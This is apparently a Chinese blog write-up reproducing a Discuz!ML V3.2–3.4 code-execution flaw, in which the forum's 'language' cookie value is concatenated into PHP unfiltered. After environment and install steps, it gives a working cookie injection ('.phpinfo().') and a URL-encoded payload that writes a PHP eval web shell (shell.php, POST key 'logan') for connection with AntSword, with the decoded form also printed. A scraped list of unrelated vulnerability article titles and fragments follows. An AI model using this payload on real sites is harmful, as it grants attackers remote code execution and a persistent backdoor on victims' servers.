1.简介
影响系统及版本:Discuz!ML V3.2-3.4
漏洞原因:Discuz!ML系统对cookie中接收的language参数内容未过滤,导致字符串拼接,从而执行php代码。

2.环境搭建

  • 网站环境:phpstudy_pro
  • DisCuz版本:3.4
  • PHP版本:php5.4.45nts
  • Apache版本:2.4.39
  • Mysql版本:5.7.26

3.Discuz安装

将源码复制到网站根目录下;


在网页输入地址打开安装界面,然后一直下一步就ok了;

4.漏洞复现
用火狐浏览器打开,按下F12,在存储里面找到language函数,在值sc后面添加语句'.phpinfo().',然后点击浏览器刷新看到phpinfo界面;

上传shell,还是在刚刚那个地方位置将'.phpinfo().'替换成下面编码过后的语句,之后使用蚁剑连接;

%27.file_put_contents%28%27shell.php%27%2Curldecode%28%27%253c%253fphp%2520eval%28%2524_%2550%254F%2553%2554%255b%2522logan%2522%255d%29%253b%253f%253e%27%29%29.%27

原内容为:'.file_put_contents('shell.php',urldecode('<?php eval($_POST["logan"]);?>')).'

Discuz!ML 3.x任意代码执行漏洞相关推荐

  1. HP officejet、PageWide打印机任意代码执行漏洞cve-2017-2741 Tenable发布漏洞检测插件...

    打印机无处不在.在企业,在家里,在学校,但你在做网络安全评估的时候是否考虑过他们?你上一次更新打印机固件是什么时候?您是否知道您的打印机有公共漏洞?Tenable安全公司进行了研究,并发布了漏洞检测  ...

  2. php 168任意代码执行漏洞之php的Complex (curly) syntax

    今天了解了php 168的任意代码执行漏洞,Poc: http://192.168.6.128/pentest/cms/php168/member/post.php ?only=1 &show ...

  3. thinkphp日志泄漏漏洞_ThinkPHP框架任意代码执行漏洞的利用及其修复方法

    ThinkPHP是国内著名的开源的PHP框架,是为了简化企业级应用开发和敏捷WEB应用开发而诞生的.最早诞生于2006年初,原名FCS,2007年元旦正式更名为ThinkPHP,并且遵循Apache2 ...

  4. 基于qtc++设计文本编辑器的代码_文本编辑器Vim/Neovim被曝任意代码执行漏洞,Notepad:兄弟等你好久了...

    犹记前些日子,微软的记事本文本编辑器爆出了本地代码执行漏洞. Google Project Zero研究员Tavis Ormandy宣布在微软的记事本文本编辑器中发现代码执行漏洞. 可以看见,他在no ...

  5. Apple任意代码执行漏洞

    报告编号:B6-2021-072701 报告来源:360CERT 报告作者:360CERT 更新日期:2021-07-27 0x01 漏洞简述 2021年07月27日,360CERT监测发现Apple ...

  6. 记一次海洋cms任意代码执行漏洞拿shell(url一句话)

    实验环境:海洋CMS6.54(后续版本已该洞已补) 1.后台登录尝试 这个站点是个测试站,站里没什么数据. 进入admin.php,是带验证码的后台登录系统,没有验证码的可以用bp爆破.有验证码的也有 ...

  7. Apache Log4j任意代码执行漏洞安全风险通告第三次更新

    奇安信CERT 致力于第一时间为企业级用户提供安全风险通告和有效解决方案. 风险通告 近日,奇安信CERT监测到Apache Log4j存在任意代码执行漏洞.经过分析,该组件存在Java JNDI注入 ...

  8. Nette框架未授权任意代码执行漏洞分析

    Nette框架未授权任意代码执行漏洞分析 漏洞介绍: Nette Framework 是个强大,基于组件的事件驱动 PHP 框架,用来创建 web 应用.Nette Framework 是个现代化风格 ...

  9. 文本编辑器Vim/Neovim被曝任意代码执行漏洞,Notepad:兄弟等你好久了

    犹记前些日子,微软的记事本文本编辑器爆出了本地代码执行漏洞. Google Project Zero研究员Tavis Ormandy宣布在微软的记事本文本编辑器中发现代码执行漏洞. 可以看见,他在no ...

  10. 绿盟科技网络安全威胁周报2017.11 关注Apache Struts2 任意代码执行漏洞 CVE-2017-5638...

    绿盟科技发布了本周安全通告,周报编号NSFOCUS-17-11,绿盟科技漏洞库本周新增136条,其中高危63条.本次周报建议大家关注 Apache Struts2 任意代码执行漏洞 CVE-2017- ...

最新文章

  1. 前端面试题学习和总结
  2. Mybatis-Plus升级完成! 我的系统到底更新了什么?Mybatis-Plus比Mybatis好在了哪里?
  3. webgl(three.js)实现室内定位,楼宇bim、实时定位三维可视化解决方案——第五课
  4. java视频流传输_java – 使用Xuggler流式传输视频
  5. Xtrabackup的“流”及“备份压缩”功能
  6. HTTP协议1之协议详解--转
  7. 为了做服务注册迁移,我提前准备了这些东西,来看看对你有没有用!
  8. C语言 socket
  9. 在Android Studio中使用Method trace,查看某进程的所有线程trace的方法
  10. python airflow_airflow python 包采坑指南
  11. Drools(BRMS) 速成教程(上)
  12. 如何深入Delphi编程
  13. 关于移植STM32f107网口程序到GD32f107的问题
  14. 补第十一次课作业(法律法规、标准规范、职业道德)
  15. PMP学习笔记20161130
  16. html5怎么查看路由器状态,怎么看路由器是否正常_怎么看路由器是否联网?-192路由网...
  17. 墨水染色之广度优先搜索(C语言实现)
  18. 数据库trunc的用法
  19. spark任务一直卡住,问题分析、解决
  20. 信息安全实训周——五月四日学习记录

热门文章

  1. matlab中函数imhist的用法
  2. 酒店客房管理信息系统
  3. Maven超级详细安装教程ovo
  4. CAD/DWG图纸在线浏览/查看/预览/解析插件/SDK
  5. CorelDRAW2022新版本序列号 cdrx8安装向导教程
  6. batchplot插件用法_教大家Batchplot批量打印插件用不了怎么办
  7. 基于神经网络的分类设计——模式识别实验
  8. 薛定谔Maestro--LigPrep 准备配体
  9. 直流调速系统概述工作原理实训教学
  10. C# 监控字段_资产运营专业线升级公告(资源、物业、运维监控)